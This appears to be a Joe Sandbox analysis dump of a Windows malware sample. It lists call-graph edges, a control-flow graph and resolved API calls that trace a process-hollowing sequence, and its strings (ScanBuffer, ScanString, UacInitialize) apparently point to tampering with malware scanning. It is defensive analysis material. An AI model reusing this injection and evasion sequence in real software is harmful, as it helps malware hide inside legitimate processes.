ExitProcess 29421->29422 29424 27d8838 29423->29424 29425 27d8857 LoadLibraryA 29424->29425 29426 27d8867 29425->29426 29427 27d8020 17 API calls 29426->29427 29428 27d886d 29427->29428 29429 27d80c8 15 API calls 29428->29429 29430 27d8886 29429->29430 29431 27d7d00 18 API calls 29430->29431 29432 27d88e5 FreeLibrary 29431->29432 29433 27d88fd 29432->29433 29434 27c44d0 11 API calls 29433->29434 29435 27d890a 29434->29435 29435->28613 29443 27ddf54 29436->29443 29437 27ddfd7 29438 27c44ac 11 API calls 29437->29438 29440 27ddfdf 29438->29440 29439 27c49a4 11 API calls 29439->29443 29441 27c4500 11 API calls 29440->29441 29442 27ddfea 29441->29442 29444 27c44d0 11 API calls 29442->29444 29443->29437 29443->29439 29445 27de004 29444->29445 29445->28640 29447 27de6d7 29446->29447 29448 27de702 RegOpenKeyA 29447->29448 29449 27de710 29448->29449 29450 27c49a4 11 API calls 29449->29450 29451 27de728 29450->29451 29452 27de735 RegSetValueExA RegCloseKey 29451->29452 29453 27de759 29452->29453 29454 27c44d0 11 API calls 29453->29454 29455 27de766 29454->29455 29456 27c44ac 11 API calls 29455->29456 29457 27de76e 29456->29457 29457->28643 29459 27de565 29458->29459 29460 27de591 29459->29460 29928 27c4694 11 API calls 29459->29928 29929 27c4500 11 API calls 29459->29929 29462 27c44ac 11 API calls 29460->29462 29463 27de5a6 29462->29463 29463->28901 29930 27c494c 29465->29930 29468 27c7e2d 29468->28966 29468->28971 29470 27ddae2 29469->29470 29932 27c4ecc 29470->29932 29472 27ddaea 29473 27ddb0a RtlDosPa 29472->29473 29938 27dda1c 29473->29938 29475 27ddb26 NtCreateFile 29476 27ddb51 29475->29476 29477 27c49a4 11 API calls 29476->29477 29478 27ddb63 NtWriteFile NtClose 29477->29478 29479 27ddb8d 29478->29479 29939 27c4c0c 29479->29939 29482 27c44ac 11 API calls 29483 27ddb9d 29482->29483 29483->28966 29486 27c4958 29484->29486 29485 27c4993 29490 27d8bb0 29485->29490 29486->29485 29487 27c4570 11 API calls 29486->29487 29488 27c496f 29487->29488 29488->29485 29489 27c2c2c 11 API calls 29488->29489 29489->29485 29491 27d8bb8 29490->29491 29492 27c480c 11 API calls 29491->29492 29493 27d8bfb 29492->29493 29494 27c4798 11 API calls 29493->29494 29495 27d8c20 29494->29495 29496 27d8824 20 API calls 29495->29496 29497 27d8c3b 29496->29497 29498 27c480c 11 API calls 29497->29498 29499 27d8c54 29498->29499 29500 27c4798 11 API calls 29499->29500 29501 27d8c79 29500->29501 29502 27d8824 20 API calls 29501->29502 29503 27d8c94 29502->29503 29504 27da6f7 29503->29504 29505 27c480c 11 API calls 29503->29505 29506 27c44d0 11 API calls 29504->29506 29509 27d8cc5 29505->29509 29507 27da714 29506->29507 29508 27c44d0 11 API calls 29507->29508 29510 27da724 29508->29510 29512 27c4798 11 API calls 29509->29512 29511 27c4c0c SysFreeString 29510->29511 29513 27da72f 29511->29513 29518 27d8cea 29512->29518 29514 27c44d0 11 API calls 29513->29514 29515 27da73f 29514->29515 29516 27c44ac 11 API calls 29515->29516 29517 27da747 29516->29517 29519 27c44d0 11 API calls 29517->29519 29521 27d8824 20 API calls 29518->29521 29520 27da754 29519->29520 29522 27c44d0 11 API calls 29520->29522 29523 27d8d05 29521->29523 29524 27da761 29522->29524 29525 27c480c 11 API calls 29523->29525 29524->28811 29526 27d8d1e 29525->29526 29527 27c4798 11 API calls 29526->29527 29528 27d8d43 29527->29528 29529 27d8824 20 API calls 29528->29529 29530 27d8d5e 29529->29530 29530->29504 29531 27c480c 11 API calls 29530->29531 29532 27d8da6 29531->29532 29533 27c4798 11 API calls 29532->29533 29534 27d8dcb 29533->29534 29535 27d8824 20 API calls 29534->29535 29536 27d8de6 29535->29536 29537 27c480c 11 API calls 29536->29537 29538 27d8dff 29537->29538 29539 27c4798 11 API calls 29538->29539 29540 27d8e24 29539->29540 29541 27d8824 20 API calls 29540->29541 29542 27d8e3f 29541->29542 29543 27c480c 11 API calls 29542->29543 29544 27d8e84 29543->29544 29545 27c4798 11 API calls 29544->29545 29546 27d8ea9 29545->29546 29547 27d8824 20 API calls 29546->29547 29548 27d8ec4 29547->29548 29549 27c480c 11 API calls 29548->29549 29550 27d8edd 29549->29550 29551 27c4798 11 API calls 29550->29551 29552 27d8f05 29551->29552 29553 27d8824 20 API calls 29552->29553 29554 27d8f23 29553->29554 29555 27c480c 11 API calls 29554->29555 29556 27d8f3f 29555->29556 29557 27c4798 11 API calls 29556->29557 29558 27d8f70 29557->29558 29559 27d8824 20 API calls 29558->29559 29560 27d8f94 29559->29560 29561 27c480c 11 API calls 29560->29561 29562 27d8fb0 29561->29562 29563 27c4798 11 API calls 29562->29563 29564 27d8fe1 29563->29564 29565 27d8824 20 API calls 29564->29565 29566 27d9005 29565->29566 29567 27c480c 11 API calls 29566->29567 29568 27d9021 29567->29568 29569 27c4798 11 API calls 29568->29569 29570 27d9052 29569->29570 29571 27d8824 20 API calls 29570->29571 29572 27d9076 29571->29572 29942 27d85dc 29572->29942 29575 27d9128 29576 27c480c 11 API calls 29575->29576 29578 27d9144 29576->29578 29577 27c480c 11 API calls 29579 27d90d3 29577->29579 29580 27c4798 11 API calls 29578->29580 29581 27c4798 11 API calls 29579->29581 29582 27d9175 29580->29582 29583 27d9104 29581->29583 29584 27d8824 20 API calls 29582->29584 29585 27d8824 20 API calls 29583->29585 29586 27d9199 29584->29586 29585->29575 29587 27d8824 20 API calls 29586->29587 29588 27d91cc 29587->29588 29589 27c480c 11 API calls 29588->29589 29590 27d91e8 29589->29590 29591 27c4798 11 API calls 29590->29591 29592 27d9219 29591->29592 29593 27d8824 20 API calls 29592->29593 29594 27d923d 29593->29594 29595 27c480c 11 API calls 29594->29595 29596 27d9259 29595->29596 29597 27c4798 11 API calls 29596->29597 29598 27d928a 29597->29598 29599 27d8824 20 API calls 29598->29599 29600 27d92ae 29599->29600 29601 27c2ee0 2 API calls 29600->29601 29602 27d92b3 29601->29602 29603 27c480c 11 API calls 29602->29603 29604 27d92f6 29603->29604 29605 27c4798 11 API calls 29604->29605 29606 27d9327 29605->29606 29607 27d8824 20 API calls 29606->29607 29608 27d934b 29607->29608 29609 27c480c 11 API calls 29608->29609 29610 27d9367 29609->29610 29611 27c4798 11 API calls 29610->29611 29612 27d9398 29611->29612 29613 27d8824 20 API calls 29612->29613 29614 27d93bc 29613->29614 29615 27c480c 11 API calls 29614->29615 29616 27d93d8 29615->29616 29617 27c4798 11 API calls 29616->29617 29618 27d9409 29617->29618 29619 27d8824 20 API calls 29618->29619 29620 27d942d GetThreadContext 29619->29620 29620->29504 29621 27d944f 29620->29621 29622 27c480c 11 API calls 29621->29622 29623 27d946b 29622->29623 29624 27c4798 11 API calls 29623->29624 29625 27d949c 29624->29625 29626 27d8824 20 API calls 29625->29626 29627 27d94c0 29626->29627 29628 27c480c 11 API calls 29627->29628 29629 27d94dc 29628->29629 29630 27c4798 11 API calls 29629->29630 29631 27d950d 29630->29631 29632 27d8824 20 API calls 29631->29632 29633 27d9531 29632->29633 29634 27c480c 11 API calls 29633->29634 29635 27d954d 29634->29635 29636 27c4798 11 API calls 29635->29636 29637 27d957e 29636->29637 29638 27d8824 20 API calls 29637->29638 29639 27d95a2 29638->29639 29640 27c480c 11 API calls 29639->29640 29641 27d95be 29640->29641 29642 27c4798 11 API calls 29641->29642 29643 27d95ef 29642->29643 29644 27d8824 20 API calls 29643->29644 29645 27d9613 29644->29645 29646 27c480c 11 API calls 29645->29646 29647 27d962f 29646->29647 29648 27c4798 11 API calls 29647->29648 29649 27d9660 29648->29649 29650 27d8824 20 API calls 29649->29650 29651 27d9684 29650->29651 29954 27d8254 29651->29954 29654 27d99bf 29656 27c480c 11 API calls 29654->29656 29655 27d96b8 29657 27c480c 11 API calls 29655->29657 29658 27d99db 29656->29658 29659 27d96d4 29657->29659 29660 27c4798 11 API calls 29658->29660 29661 27c4798 11 API calls 29659->29661 29662 27d9a0c 29660->29662 29663 27d9705 29661->29663 29664 27d8824 20 API calls 29662->29664 29665 27d8824 20 API calls 29663->29665 29666 27d99b8 29664->29666 29667 27d9729 29665->29667 29668 27c480c 11 API calls 29666->29668 29669 27c480c 11 API calls 29667->29669 29671 27d9a4c 29668->29671 29670 27d9745 29669->29670 29673 27c4798 11 API calls 29670->29673 29672 27c4798 11 API calls 29671->29672 29674 27d9a7d 29672->29674 29675 27d9776 29673->29675 29676 27d8824 20 API calls 29674->29676 29677 27d8824 20 API calls 29675->29677 29678 27d9aa1 29676->29678 29679 27d979a 29677->29679 29680 27c480c 11 API calls 29678->29680 29681 27c480c 11 API calls 29679->29681 29682 27d9abd 29680->29682 29683 27d97b6 29681->29683 29685 27c4798 11 API calls 29682->29685 29684 27c4798 11 API calls 29683->29684 29687 27d97e7 29684->29687 29686 27d9aee 29685->29686 29688 27d8824 20 API calls 29686->29688 29689 27d8824 20 API calls 29687->29689 29690 27d9b12 29688->29690 29691 27d980b 29689->29691 29692 27c480c 11 API calls 29690->29692 29968 27d84c4 29691->29968 29699 27d9b2e 29692->29699 29695 27d984b 29698 27c480c 11 API calls 29695->29698 29696 27d9823 29697 27d79b4 18 API calls 29696->29697 29700 27d9844 29697->29700 29703 27d9867 29698->29703 29701 27c4798 11 API calls 29699->29701 29702 27c480c 11 API calls 29700->29702 29705 27d9b5f 29701->29705 29706 27d98d8 29702->29706 29704 27c4798 11 API calls 29703->29704 29710 27d9898 29704->29710 29707 27d8824 20 API calls 29705->29707 29708 27c4798 11 API calls 29706->29708 29709 27d9b83 29707->29709 29714 27d9909 29708->29714 29711 27d79b4 18 API calls 29709->29711 29713 27d8824 20 API calls 29710->29713 29712 27d9ba4 29711->29712 29712->29504 29715 27c480c 11 API calls 29712->29715 29713->29700 29716 27d8824 20 API calls 29714->29716 29719 27d9bd2 29715->29719 29717 27d992d 29716->29717 29718 27c480c 11 API calls 29717->29718 29721 27d9949 29718->29721 29720 27c4798 11 API calls 29719->29720 29723 27d9c03 29720->29723 29722 27c4798 11 API calls 29721->29722 29726 27d997a 29722->29726 29724 27d8824 20 API calls 29723->29724 29725 27d9c27 29724->29725 29727 27c480c 11 API calls 29725->29727 29728 27d8824 20 API calls 29726->29728 29731 27d9c43 29727->29731 29729 27d999e 29728->29729 29982 27d79b4 29729->29982 29732 27c4798 11 API calls 29731->29732 29733 27d9c74 29732->29733 29734 27d8824 20 API calls 29733->29734 29735 27d9c98 29734->29735 29996 27d8ac0 29735->29996 29737 27c480c 11 API calls 29739 27d9d1f 29737->29739 29738 27d9c9f 29738->29737 29740 27c4798 11 API calls 29739->29740 29741 27d9d50 29740->29741 29742 27d8824 20 API calls 29741->29742 29743 27d9d74 29742->29743 29744 27c480c 11 API calls 29743->29744 29745 27d9d90 29744->29745 29746 27c4798 11 API calls 29745->29746 29747 27d9dc1 29746->29747 29748 27d8824 20 API calls 29747->29748 29749 27d9de5 29748->29749 29750 27c480c 11 API calls 29749->29750 29751 27d9e01 29750->29751 29752 27c4798 11 API calls 29751->29752 29753 27d9e32 29752->29753 29754 27d8824 20 API calls 29753->29754 29755 27d9e56 29754->29755 29756 27d7d00 18 API calls 29755->29756 29757 27d9e73 29756->29757 29758 27c480c 11 API calls 29757->29758 29759 27d9e8f 29758->29759 29760 27c4798 11 API calls 29759->29760 29761 27d9ec0 29760->29761 29762 27d8824 20 API calls 29761->29762 29763 27d9ee4 29762->29763 29764 27c480c 11 API calls 29763->29764 29765 27d9f00 29764->29765 29766 27c4798 11 API calls 29765->29766 29767 27d9f31 29766->29767 29768 27d8824 20 API calls 29767->29768 29769 27d9f55 29768->29769 29770 27c480c 11 API calls 29769->29770 29771 27d9f71 29770->29771 29772 27c4798 11 API calls 29771->29772 29773 27d9fa2 29772->29773 29774 27d8824 20 API calls 29773->29774 29775 27d9fc6 29774->29775 29776 27d7d00 18 API calls 29775->29776 29777 27d9fe6 29776->29777 29778 27c480c 11 API calls 29777->29778 29779 27da002 29778->29779 29780 27c4798 11 API calls 29779->29780 29781 27da033 29780->29781 29782 27d8824 20 API calls 29781->29782 29783 27da057 29782->29783 29784 27c480c 11 API calls 29783->29784 29785 27da073 29784->29785 29786 27c4798 11 API calls 29785->29786 29787 27da0a4 29786->29787 29788 27d8824 20 API calls 29787->29788 29789 27da0c8 29788->29789 29790 27c480c 11 API calls 29789->29790 29791 27da0e4 29790->29791 29792 27c4798 11 API calls 29791->29792 29793 27da115 29792->29793 29794 27d8824 20 API calls 29793->29794 29795 27da139 SetThreadContext NtResumeThread 29794->29795 29796 27c480c 11 API calls 29795->29796 29797 27da185 29796->29797 29798 27c4798 11 API calls 29797->29798 29799 27da1b6 29798->29799 29800 27d8824 20 API calls 29799->29800 29801 27da1da 29800->29801 29802 27c480c 11 API calls 29801->29802 29803 27da1f6 29802->29803 29804 27c4798 11 API calls 29803->29804 29805 27da227 29804->29805 29806 27d8824 20 API calls 29805->29806 29807 27da24b 29806->29807 29808 27c480c 11 API calls 29807->29808 29809 27da267 29808->29809 29810 27c4798 11 API calls 29809->29810 29811 27da298 29810->29811 29812 27d8824 20 API calls 29811->29812 29813 27da2bc 29812->29813 29814 27c480c 11 API calls 29813->29814 29815 27da2d8 29814->29815 29816 27c4798 11 API calls 29815->29816 29817 27da309 29816->29817 29818 27d8824 20 API calls 29817->29818 29819 27da32d 29818->29819 29820 27c2c2c 11 API calls 29819->29820 29821 27da33c 29820->29821 29822 27c480c 11 API calls 29821->29822 29823 27da35e 29822->29823 29824 27c4798 11 API calls 29823->29824 29825 27da38f 29824->29825 29826 27d8824 20 API calls 29825->29826 29827 27da3b3 29826->29827 29828 27d87a0 21 API calls 29827->29828 29829 27da3c7 29828->29829 29830 27d87a0 21 API calls 29829->29830 29831 27da3db 29830->29831 29832 27d87a0 21 API calls 29831->29832 29833 27da3ef 29832->29833 29834 27c480c 11 API calls 29833->29834 29835 27da40b 29834->29835 29836 27c4798 11 API calls 29835->29836 29837 27da43c 29836->29837 29838 27d8824 20 API calls 29837->29838 29839 27da460 29838->29839 29840 27d87a0 21 API calls 29839->29840 29841 27da474 29840->29841 29842 27d87a0 21 API calls 29841->29842 29843 27da488 29842->29843 29844 27c480c 11 API calls 29843->29844 29845 27da4a4 29844->29845 29846 27c4798 11 API calls 29845->29846 29847 27da4c2 29846->29847 29848 27d87a0 21 API calls 29847->29848 29849 27da4da 29848->29849 29850 27c480c 11 API calls 29849->29850 29851 27da4f6 29850->29851 29852 27c4798 11 API calls 29851->29852 29853 27da514 29852->29853 29854 27d87a0 21 API calls 29853->29854 29855 27da52c 29854->29855 29856 27d87a0 21 API calls 29855->29856 29857 27da540 29856->29857 29858 27d87a0 21 API calls 29857->29858 29859 27da554 29858->29859 29860 27d87a0 21 API calls 29859->29860 29861 27da568 29860->29861 29862 27d87a0 21 API calls 29861->29862 29863 27da57c 29862->29863 29864 27c480c 11 API calls 29863->29864 29865 27da598 29864->29865 29866 27c4798 11 API calls 29865->29866 29867 27da5b6 29866->29867 29868 27d87a0 21 API calls 29867->29868 29869 27da5ce 29868->29869 29870 27c480c 11 API calls 29869->29870 29871 27da5ea 29870->29871 29872 27c4798 11 API calls 29871->29872 29873 27da608 29872->29873 29874 27d87a0 21 API calls 29873->29874 29875 27da620 29874->29875 29876 27c480c 11 API calls 29875->29876 29877 27da63c 29876->29877 29878 27c4798 11 API calls 29877->29878 29879 27da65a 29878->29879 29880 27d87a0 21 API calls 29879->29880 29881 27da672 29880->29881 29882 27c480c 11 API calls 29881->29882 29883 27da68e 29882->29883 29884 27c4798 11 API calls 29883->29884 29885 27da6ac 29884->29885 29886 27d87a0 21 API calls 29885->29886 29887 27da6c4 29886->29887 29888 27d87a0 21 API calls 29887->29888 29889 27da6e3 29888->29889 29890 27d87a0 21 API calls 29889->29890 29890->29504 29892 27c4500 11 API calls 29891->29892 29893 27d81af 29892->29893 29894 27c480c 11 API calls 29893->29894 29895 27d81ce 29894->29895 29896 27d8020 17 API calls 29895->29896 29897 27d81e1 29896->29897 29898 27d80c8 15 API calls 29897->29898 29899 27d81e7 FlushInstructionCache 29898->29899 29900 27d820d 29899->29900 29901 27c44ac 11 API calls 29900->29901 29902 27d8215 29901->29902 29902->29405 29904 27c4500 11 API calls 29903->29904 29905 27d8433 29904->29905 29906 27c480c 11 API calls 29905->29906 29907 27d8452 29906->29907 29908 27d8020 17 API calls 29907->29908 29909 27d8465 29908->29909 29910 27d80c8 15 API calls 29909->29910 29911 27d846b WinExec 29910->29911 29912 27d848d 29911->29912 29913 27c44ac 11 API calls 29912->29913 29914 27d8495 29913->29914 29914->28740 29915->28800 29916->28957 29917->29010 29918->29130 29919->28964 29920->29056 29922 27d880f 29921->29922 29923 27d87c7 GetProcAddress 29921->29923 29922->29253 29924 27d8804 FreeLibrary 29923->29924 29925 27d87e1 29923->29925 29924->29922 29926 27d7d00 18 API calls 29925->29926 29927 27d87f9 29926->29927 29927->29924 29928->29459 29929->29459 29931 27c4950 GetFileAttributesA 29930->29931 29931->29468 29933 27c4ee8 29932->29933 29934 27c4ed2 SysAllocStringLen 29932->29934 29933->29472 29934->29933 29935 27c4bdc 29934->29935 29936 27c4bf8 29935->29936 29937 27c4be8 SysAllocStringLen 29935->29937 29936->29472 29937->29935 29937->29936 29938->29475 29940 27c4c20 29939->29940 29941 27c4c12 SysFreeString 29939->29941 29940->29482 29941->29940 29943 27c4500 11 API calls 29942->29943 29944 27d85ff 29943->29944 29945 27c480c 11 API calls 29944->29945 29946 27d861e 29945->29946 29947 27d8020 17 API calls 29946->29947 29948 27d8631 29947->29948 29949 27d80c8 15 API calls 29948->29949 29950 27d8637 CreateProcessAsUserW 29949->29950 29951 27d867b 29950->29951 29952 27c44ac 11 API calls 29951->29952 29953 27d8683 29952->29953 29953->29575 29953->29577 29955 27c4500 11 API calls 29954->29955 29956 27d8279 29955->29956 29957 27d7914 12 API calls 29956->29957 29958 27d8286 29957->29958 29959 27c4798 11 API calls 29958->29959 29960 27d8293 29959->29960 29961 27d8020 17 API calls 29960->29961 29962 27d82a6 29961->29962 29963 27d80c8 15 API calls 29962->29963 29964 27d82ac NtReadVirtualMemory 29963->29964 29965 27d82da 29964->29965 29966 27c44d0 11 API calls 29965->29966 29967 27d82e7 29966->29967 29967->29654 29967->29655 29969 27c4500 11 API calls 29968->29969 29970 27d84e9 29969->29970 29971 27d7914 12 API calls 29970->29971 29972 27d84f6 29971->29972 29973 27c4798 11 API calls 29972->29973 29974 27d8503 29973->29974 29975 27d8020 17 API calls 29974->29975 29976 27d8516 29975->29976 29977 27d80c8 15 API calls 29976->29977 29978 27d851c NtUnmapViewOfSection 29977->29978 29979 27d853c 29978->29979 29980 27c44d0 11 API calls 29979->29980 29981 27d8549 29980->29981 29981->29695 29981->29696 29983 27c4500 11 API calls 29982->29983 29984 27d79d9 29983->29984 29985 27d7914 12 API calls 29984->29985 29986 27d79e6 29985->29986 29987 27c4798 11 API calls 29986->29987 29988 27d79f3 29987->29988 29989 27d8020 17 API calls 29988->29989 29990 27d7a06 29989->29990 29991 27d80c8 15 API calls 29990->29991 29992 27d7a0c NtAllocateVirtualMemory 29991->29992 29993 27d7a3d 29992->29993 29994 27c44d0 11 API calls 29993->29994 29995 27d7a4a 29994->29995 29995->29666 29997 27c2c10 11 API calls 29996->29997 29998 27d8af6 29997->29998 29998->29738

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 6797 27d8bb0-27d8bb3 6798 27d8bb8-27d8bbd 6797->6798 6798->6798 6799 27d8bbf-27d8ca6 call 27c493c call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 6798->6799 6830 27d8cac-27d8d87 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 6799->6830 6831 27da6f7-27da761 call 27c44d0 * 2 call 27c4c0c call 27c44d0 call 27c44ac call 27c44d0 * 2 6799->6831 6830->6831 6875 27d8d8d-27d90b5 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c30d4 * 2 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c4d8c call 27c4d9c call 27d85dc 6830->6875 6984 27d9128-27d9449 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c2ee0 call 27c2f08 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 GetThreadContext 6875->6984 6985 27d90b7-27d9123 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 6875->6985 6984->6831 7093 27d944f-27d96b2 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d8254 6984->7093 6985->6984 7166 27d99bf-27d9a2b call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 7093->7166 7167 27d96b8-27d9821 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d84c4 7093->7167 7194 27d9a30-27d9bb0 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d79b4 7166->7194 7257 27d984b-27d98b7 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 7167->7257 7258 27d9823-27d9849 call 27d79b4 7167->7258 7194->6831 7298 27d9bb6-27d9caf call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d8ac0 7194->7298 7267 27d98bc-27d99b3 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d79b4 7257->7267 7258->7267 7337 27d99b8-27d99bd 7267->7337 7349 27d9cb1-27d9cfe call 27d89b8 call 27d89ac 7298->7349 7350 27d9d03-27da45b call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d7d00 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d7d00 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 SetThreadContext NtResumeThread call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c2c2c call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d87a0 * 3 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 7298->7350 7337->7194 7349->7350 7575 27da460-27da6f2 call 27d87a0 * 2 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 * 5 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 call 27d7ed4 call 27d87a0 * 2 7350->7575 7575->6831
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8824: LoadLibraryA.KERNEL32(00000000,00000000,027D890B), ref: 027D8858
                                                                                                                                                • Part of subcall function 027D8824: FreeLibrary.KERNEL32(74AD0000,00000000,02821388,Function_000065D8,00000004,02821398,02821388,05F5E0FF,00000040,0282139C,74AD0000,00000000,00000000,00000000,00000000,027D890B), ref: 027D88EB
                                                                                                                                                • Part of subcall function 027D85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027D8668
                                                                                                                                              • GetThreadContext.KERNEL32(00000614,02821420,ScanString,028213A4,027DA77C,UacInitialize,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,UacInitialize,028213A4), ref: 027D9442
                                                                                                                                                • Part of subcall function 027D8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D82C5
                                                                                                                                                • Part of subcall function 027D84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 027D8529
                                                                                                                                                • Part of subcall function 027D79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027D7A27
                                                                                                                                                • Part of subcall function 027D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D7D74
                                                                                                                                              • SetThreadContext.KERNEL32(00000614,02821420,ScanBuffer,028213A4,027DA77C,ScanString,028213A4,027DA77C,Initialize,028213A4,027DA77C,0000087C,003B3FF8,028214F8,00000004,028214FC), ref: 027DA157
                                                                                                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000614,00000000,00000614,02821420,ScanBuffer,028213A4,027DA77C,ScanString,028213A4,027DA77C,Initialize,028213A4,027DA77C,0000087C,003B3FF8,028214F8), ref: 027DA164
                                                                                                                                                • Part of subcall function 027D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize,028213A4,027DA77C,UacScan), ref: 027D87B4
                                                                                                                                                • Part of subcall function 027D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027D87CE
                                                                                                                                                • Part of subcall function 027D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize), ref: 027D880A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
